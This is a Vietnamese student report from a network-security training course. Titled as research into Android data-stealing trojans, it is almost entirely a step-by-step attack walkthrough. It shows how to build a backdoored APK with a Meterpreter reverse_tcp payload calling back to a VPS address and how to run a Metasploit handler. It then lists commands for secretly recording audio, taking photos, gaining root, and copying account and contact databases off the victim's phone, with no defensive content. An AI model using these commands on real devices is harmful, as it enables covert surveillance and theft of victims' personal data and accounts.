1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG
QUỐC TẾ
ĐỀ TÀI :
NGHIÊN CỨU CÁC TROJAN, MALWARE CHO
PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH
CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ
DỤNG ANDROID VÀ GỬI RA NGOÀI
BÁO CÁO TUẦN 5
GVHD: VÕ ĐỖ THẮNG
SVTH: TRẦN THANH THÔNG
MSSV: 1120168
2. TẤN CÔNG MÁY ANDROID TỪ MÁY VPS
1. Tạo ứng dụng chứa mã độc trên Kali Linux:
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại
Android
Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal .
Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter:
“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS>
lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>”
Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162
lport=4444 R> /root/Desktop/hack.apk
2. Tấn công đi ện thoại Android:
Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có
thể mất vài chục phút.
Bước 2: Tiến hành thiết đặt payload bằng các lệnh
“ use exploit/multi/handler ”
“ set payload android/meterpreter/reverse_tcp ”
“ set lhost 14.0.21.162 ”
“ set lport 4444 ”
“ run ”
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor
ở trên.
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ
máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ
nhận được thông báo như sau:
3. Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
3. Các phương thức tấn công được sử dụng:
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân.
3.1 Ghi âm lén:
Sử dụng lệnh: “ record_mic <số giây ghi âm> ”
3.2 Sử dụng camera:
Xem danh sách webcam của thiết bị: “ webcam_list ”
Chụp ảnh lén: “webcam_snap <mã camera>”
4. 3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard:
Di chuyển vào thư mục bằng lệnh: cd
Tải về bằng lệnh: download <tên file>
Xóa tập tin bằng lệnh: rm <tên file>
3.4 Truy cập trực ti ếp vào hệ thống:
5. Truy cập vào hệ thống bằng lệnh: “shell ” > “su”
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami ”
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có
thể tiếp tục tấn công.
3.5 Truy cập và khai thác tài khoản người dùng:
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –
l”
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
7. Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
8. 3.6 Truy cập và đánh cắp danh bạ điện thoại:
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại:
“cd /data/data/com.android.providers.contacts/databases”
Copy về thẻ sdcard và tải về máy
9. Xem nội dung của contacts2.db bằng SQLite Manager
10.
11. 3.7 Một số câu l ệnh khác:
- Để biết thêm về các lệnh có thể thực hiện ta dùng help
- Để xem thông tin về máy, nhập lệnh sysinfo
- Để xem các tác vụ đang chạy gõ ps
- Xem ip của máy bị hack ta gõ ipconfig
- Xem danh sách thư mục, file gõ ls
12. - Để upload gõ lệnh upload
- ls -l danh mục file và các quyền
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền
/DATA
/DATA/APP
/DATA/SYSTEM
/DATA/SYSTEM/accounts.db
/DATA/SYSTEM/SYNC/accounts.xml
/SYSTEM/APP/
- Để xem danh sách và down load các file hay thay đổi các file trong ROM
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename
Ví dụ chmod -R 777 /data
- Ctrl + C để quay lại